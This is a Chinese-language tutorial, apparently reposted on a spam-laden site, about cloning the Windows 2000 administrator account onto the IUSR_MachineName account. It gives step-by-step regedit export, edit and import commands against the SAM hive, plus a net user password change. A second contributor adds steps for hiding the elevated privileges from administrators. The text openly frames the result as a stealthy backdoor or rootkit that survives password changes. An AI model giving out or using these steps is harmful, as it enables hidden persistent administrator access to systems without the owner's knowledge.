日本免费全黄少妇一区二区三区-高清无码一区二区三区四区-欧美中文字幕日韩在线观看-国产福利诱惑在线网站-国产中文字幕一区在线-亚洲欧美精品日韩一区-久久国产精品国产精品国产-国产精久久久久久一区二区三区-欧美亚洲国产精品久久久久

克隆windows 2000管理員帳號

首先要讓大家知道的概念是在Windows 2000和Windows NT里,默認(rèn)管理員帳號的SID是固定的500(0x1f4),那么我們可以用機器里已經(jīng)存在的一個帳號將SID為500的帳號進行克隆,在這里我們選擇的帳號是IUSR_MachineName(當(dāng)然,為了加強隱蔽性,我們選擇了這個帳號,所有用戶都可以用以下的方法,只不過這個用戶較常見罷了),測試環(huán)境為Windows 2000 Server 。

運行一個System的CMD Shell( http://www.sometips.com/tips/scripts/173.htm 或使用 Http://www.sometips.com/soft/psu.exe),然后在該CMD Shell里面運行 regedit /e adam.reg HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers00001F4 這樣我們將SID 為500的管理員帳號的相關(guān)信息導(dǎo)出,然后編輯adam.reg文件,將adam.reg文件的第三行-[HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers00001F4]最后的"1F4"修改為IUSR_MachineName的SID(大部分的機器該用戶的SID都為0x3E9,如果機器在最初安裝的時候沒有安裝IIS,而自己創(chuàng)建了帳號后再安裝IIS就有可能不是這個值),將Root.reg文件中的"1F4"修改為"3E9"后執(zhí)行 regedit /s adam.reg 導(dǎo)入該Reg文件

然后運行

net user IUSR_MachineName Sometips

修改IUSR_MachineName的密碼(最好使用14位的密碼,越像IUSR_MachineName的密碼越好)

OK,大功告成...

這樣,我們擁有和默認(rèn)管理員一樣的桌面、一樣的Profile.....

而且,當(dāng)我們運行 net localgroup administrators 時,看看結(jié)果:

C:>net localgroup administrators

Alias name administrators

Comment Administrators have complete and unrestricted access to the computer/domain

Members

------------------------------------------------------------------------------

Administrator

The command completed successfully.

再看看USER2SID的輸出結(jié)果:

C:>user2sid Administrator

S-1-5-21-1004336348-1078145449-854245398-500

Number of subauthoritIEs is 5

Domain is IDONTKNOW

Length of SID in memory is 28 bytes

Type of SID is SidTypeUser

C:>user2sid iusr_machinename

S-1-5-21-1004336348-1078145449-854245398-1001

Number of subauthorities is 5

Domain is IDONTKNOW

Length of SID in memory is 28 bytes

Type of SID is SidTypeUser
我想,再高明的管理員也看不到任何的異狀了...而且,隨便管理員改成什么密碼,我照樣可以用IUSR_MachineName,密碼為Sometips登陸...(沒有哪位大俠級的管理員喜歡經(jīng)常修改IUSR_MachineName為其他的名字吧)

^_^,這算不算RootKit...

附:

1、感謝叮叮付出需要reinstall OS的代價...

2、任何用以上方法進行試驗所導(dǎo)致的系統(tǒng)無法使用均與偶無關(guān),偶均不提供技術(shù)支持...

-----------------------------------------------------------------------------

叮叮 的補充完善

很多人提到使用了管理工具的用戶管理后,能夠發(fā)現(xiàn)IUSR_MachineName被提升了權(quán)限 。

現(xiàn)給出解決辦法 。

方法同上,不過這次修改內(nèi)容多一些 。即

這次要導(dǎo)出兩個key內(nèi)容:

一個是adam提到的

regedit /e adam.reg HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers00001F4

然后另外一個是你需要修改那個賬號的值

regedit /e iusr.reg HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers00003E9

然后按照adam提到的修改adam.reg

“將adam.reg文件的第三行--[HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers00001F4]最后的"1F4"修改為IUSR_MachineName的SID”

現(xiàn)在,你還要從iusr.reg文件中復(fù)制一下內(nèi)容

就是將iusr.reg文件中“"V"=hex:0”開始一直到iusr.reg文件結(jié)束部分復(fù)制下來

然后替換掉adam.reg中同樣位置的部分

最后使用

regedit /s adam.reg

導(dǎo)入該Reg文件

呵呵,別忘了給這個IUSR_MachineName改密碼哦 。

hehe,ok,大功告成 。

推薦閱讀